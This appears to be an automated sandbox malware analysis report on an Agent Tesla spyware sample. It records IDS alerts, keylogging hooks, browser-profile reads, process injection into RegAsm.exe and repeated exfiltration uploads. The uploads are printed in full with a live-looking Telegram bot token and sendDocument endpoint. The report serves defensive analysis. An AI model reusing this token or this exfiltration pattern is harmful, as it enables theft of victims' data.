Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.8:49728 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org

Source: global traffic	HTTP traffic detected: POST /bot5556229164:AAG06WuQ2Ibcy5ZKb4lTSDlmionK0lTPWiM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dce3703dfdeaedHost: api.telegram.orgContent-Length: 969Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot5556229164:AAG06WuQ2Ibcy5ZKb4lTSDlmionK0lTPWiM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dce37f98649edfHost: api.telegram.orgContent-Length: 4055Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot5556229164:AAG06WuQ2Ibcy5ZKb4lTSDlmionK0lTPWiM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcf63dc95ed8bcHost: api.telegram.orgContent-Length: 66189Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot5556229164:AAG06WuQ2Ibcy5ZKb4lTSDlmionK0lTPWiM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcfcf98fda5bd4Host: api.telegram.orgContent-Length: 66189Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot5556229164:AAG06WuQ2Ibcy5ZKb4lTSDlmionK0lTPWiM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcff9d314df993Host: api.telegram.orgContent-Length: 66189Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot5556229164:AAG06WuQ2Ibcy5ZKb4lTSDlmionK0lTPWiM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd02a807c14747Host: api.telegram.orgContent-Length: 71082Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot5556229164:AAG06WuQ2Ibcy5ZKb4lTSDlmionK0lTPWiM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd06261abaf81bHost: api.telegram.orgContent-Length: 66189Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot5556229164:AAG06WuQ2Ibcy5ZKb4lTSDlmionK0lTPWiM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd09fe14711de6Host: api.telegram.orgContent-Length: 66189Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot5556229164:AAG06WuQ2Ibcy5ZKb4lTSDlmionK0lTPWiM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd0c4dd95d112bHost: api.telegram.orgContent-Length: 66189Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot5556229164:AAG06WuQ2Ibcy5ZKb4lTSDlmionK0lTPWiM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd1d119704835bHost: api.telegram.orgContent-Length: 66210Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot5556229164:AAG06WuQ2Ibcy5ZKb4lTSDlmionK0lTPWiM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd220c2c8aed8dHost: api.telegram.orgContent-Length: 66210Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot5556229164:AAG06WuQ2Ibcy5ZKb4lTSDlmionK0lTPWiM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd2451751cb897Host: api.telegram.orgContent-Length: 66210Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot5556229164:AAG06WuQ2Ibcy5ZKb4lTSDlmionK0lTPWiM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd29f77b37b2d9Host: api.telegram.orgContent-Length: 69214Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot5556229164:AAG06WuQ2Ibcy5ZKb4lTSDlmionK0lTPWiM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd2dbcb9f7e0c6Host: api.telegram.orgContent-Length: 66210Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot5556229164:AAG06WuQ2Ibcy5ZKb4lTSDlmionK0lTPWiM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd36acca76dd4aHost: api.telegram.orgContent-Length: 66183Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot5556229164:AAG06WuQ2Ibcy5ZKb4lTSDlmionK0lTPWiM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dce35a771aea67Host: api.telegram.orgContent-Length: 66183Expect: 100-continueConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 104.26.12.205 104.26.12.205

Source: Joe Sandbox View	ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown

HTTP traffic detected: POST /bot5556229164:AAG06WuQ2Ibcy5ZKb4lTSDlmionK0lTPWiM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dce3703dfdeaedHost: api.telegram.orgContent-Length: 969Expect: 100-continueConnection: Keep-Alive

Source: RegAsm.exe, 00000002.00000002.3869447768.000000000332E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3869447768.00000000032FC000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3869447768.0000000003447000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3869447768.0000000003201000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3869447768.00000000031FB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3869447768.0000000003500000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: RegAsm.exe, 00000002.00000002.3869447768.00000000030B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegAsm.exe, 00000002.00000002.3869447768.00000000030B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org
Source: RegAsm.exe, 00000002.00000002.3869447768.0000000003500000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram
Source: RegAsm.exe, 00000002.00000002.3869447768.0000000003287000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3869447768.000000000332E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3869447768.00000000032FC000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3869447768.0000000003447000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3869447768.0000000003201000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3869447768.00000000031FB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3869447768.00000000031C1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3869447768.0000000003500000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: RegAsm.exe, 00000002.00000002.3869447768.00000000030B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot5556229164:AAG06WuQ2Ibcy5ZKb4lTSDlmionK0lTPWiM/
Source: RegAsm.exe, 00000002.00000002.3869447768.0000000003287000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3869447768.000000000332E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3869447768.00000000032FC000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3869447768.0000000003447000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3869447768.0000000003201000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3869447768.00000000031FB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3869447768.00000000031C1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3869447768.0000000003500000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot5556229164:AAG06WuQ2Ibcy5ZKb4lTSDlmionK0lTPWiM/sendDocument
Source: RegAsm.exe, 00000002.00000002.3869447768.00000000032FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.orgLJK
Source: 08(2)_00.exe	String found in binary or memory: https://github.com/WindOfNet/CgLogListener
Source: 08(2)_00.exe	String found in binary or memory: https://notify-api.line.me/api/notify

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

Source: unknown	HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.8:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49726 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to register a low level keyboard hook

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_06FA8F38 SetWindowsHookExA 0000000D,00000000,?,?,?,?,?,?,?,?,?,06FABC68,00000000,00000000

2_2_06FA8F38

Installs a global keyboard hook

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0737A410 GetKeyState,GetKeyState,GetKeyState,		2_2_0737A410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0737A400 GetKeyState,GetKeyState,GetKeyState,		2_2_0737A400

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_014A4128	2_2_014A4128
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_014A4470	2_2_014A4470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_014A4D40	2_2_014A4D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_014AB3F0	2_2_014AB3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_014AB264	2_2_014AB264
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_014AC9F0	2_2_014AC9F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_014AB3E0	2_2_014AB3E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_014AB258	2_2_014AB258
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_05542D58	2_2_05542D58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_05542D68	2_2_05542D68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_06FA4908	2_2_06FA4908
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_06FA9808	2_2_06FA9808
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_07308498	2_2_07308498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0730E300	2_2_0730E300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_07309388	2_2_07309388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0730B997	2_2_0730B997
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0730C9F0	2_2_0730C9F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_07305ECC	2_2_07305ECC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_07302BA8	2_2_07302BA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0730C123	2_2_0730C123
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0737BD01	2_2_0737BD01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_07372470	2_2_07372470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_07377968	2_2_07377968
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_07373840	2_2_07373840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_07375E00	2_2_07375E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0737CE78	2_2_0737CE78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0737E658	2_2_0737E658
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_073765AA	2_2_073765AA

Source: 08(2)_00.exe, 00000000.00000002.1433779096.0000000005B90000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameSeaCyanPul.dll" vs 08(2)_00.exe
Source: 08(2)_00.exe, 00000000.00000002.1432692321.0000000004319000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameDataBasePracticalJob.dllJ vs 08(2)_00.exe
Source: 08(2)_00.exe, 00000000.00000002.1432692321.0000000004319000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamec46a0699-d7ba-42cc-b530-9ae8abb85ed8.exe4 vs 08(2)_00.exe
Source: 08(2)_00.exe, 00000000.00000002.1433934439.0000000005D40000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameDataBasePracticalJob.dllJ vs 08(2)_00.exe
Source: 08(2)_00.exe, 00000000.00000002.1426927656.00000000014DE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs 08(2)_00.exe
Source: 08(2)_00.exe, 00000000.00000002.1432087935.0000000003311000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSeaCyanPul.dll" vs 08(2)_00.exe
Source: 08(2)_00.exe, 00000000.00000002.1432087935.0000000003311000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamec46a0699-d7ba-42cc-b530-9ae8abb85ed8.exe4 vs 08(2)_00.exe
Source: 08(2)_00.exe	Binary or memory string: OriginalFilenameCgLogListener.exe6 vs 08(2)_00.exe

Source: 08(2)_00.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 08(2)_00.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.08(2)_00.exe.5d40000.6.raw.unpack, Review.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.08(2)_00.exe.5d40000.6.raw.unpack, Human.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.08(2)_00.exe.33bccac.1.raw.unpack, vrQBCQEUkZhMBwkZOZJQvLwhJxnADLpQChAphAJZfsMfxEiQLivpkxrTwsUwEkZMph.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.08(2)_00.exe.5b90000.5.raw.unpack, vrQBCQEUkZhMBwkZOZJQvLwhJxnADLpQChAphAJZfsMfxEiQLivpkxrTwsUwEkZMph.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.08(2)_00.exe.33b966c.0.raw.unpack, vrQBCQEUkZhMBwkZOZJQvLwhJxnADLpQChAphAJZfsMfxEiQLivpkxrTwsUwEkZMph.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.08(2)_00.exe.43f0218.3.raw.unpack, P.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.08(2)_00.exe.43f0218.3.raw.unpack, P.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 0.2.08(2)_00.exe.43f0218.3.raw.unpack, P.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.08(2)_00.exe.43f0218.3.raw.unpack, P.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.08(2)_00.exe.5d40000.6.raw.unpack, DataBase.cs	Base64 encoded string: 'qDaFFYtxYdq4nZAfnvmArbTfOlJk8eAbgeD/unTuRE/KuleUoenxuvQ8YSzm0A5a7l5o7RrKkCON9Cjw94kq9Dy+8n7fqBmlHdwaeeYjtO1vP+8Hiiuwu8Csk0RKAROzRB3VqawswawNM+iprq5DrYr8lFqrmgTXUN9c46Su4L0RGnC7u2FUZ0b+fbhHuoh2'
Source: 0.2.08(2)_00.exe.435a978.2.raw.unpack, DataBase.cs	Base64 encoded string: 'qDaFFYtxYdq4nZAfnvmArbTfOlJk8eAbgeD/unTuRE/KuleUoenxuvQ8YSzm0A5a7l5o7RrKkCON9Cjw94kq9Dy+8n7fqBmlHdwaeeYjtO1vP+8Hiiuwu8Csk0RKAROzRB3VqawswawNM+iprq5DrYr8lFqrmgTXUN9c46Su4L0RGnC7u2FUZ0b+fbhHuoh2'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/8@3/2

Source: C:\Users\user\Desktop\08(2)_00.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\08(2)_00.exe.log

Jump to behavior

Source: C:\Users\user\AppData\Roaming\fOLFRQq\fOLFRQq.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5316:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3324:120:WilError_03

Source: 08(2)_00.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 08(2)_00.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\08(2)_00.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 08(2)_00.exe	ReversingLabs: Detection: 75%
Source: 08(2)_00.exe	Virustotal: Detection: 70%

Source: unknown	Process created: C:\Users\user\Desktop\08(2)_00.exe "C:\Users\user\Desktop\08(2)_00.exe"
Source: C:\Users\user\Desktop\08(2)_00.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\fOLFRQq\fOLFRQq.exe "C:\Users\user\AppData\Roaming\fOLFRQq\fOLFRQq.exe"
Source: C:\Users\user\AppData\Roaming\fOLFRQq\fOLFRQq.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\fOLFRQq\fOLFRQq.exe "C:\Users\user\AppData\Roaming\fOLFRQq\fOLFRQq.exe"
Source: C:\Users\user\AppData\Roaming\fOLFRQq\fOLFRQq.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\08(2)_00.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior

Source: C:\Users\user\Desktop\08(2)_00.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\08(2)_00.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\08(2)_00.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\08(2)_00.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\08(2)_00.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\08(2)_00.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\08(2)_00.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\08(2)_00.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\08(2)_00.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\08(2)_00.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\08(2)_00.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\08(2)_00.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\08(2)_00.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\08(2)_00.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\08(2)_00.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\08(2)_00.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
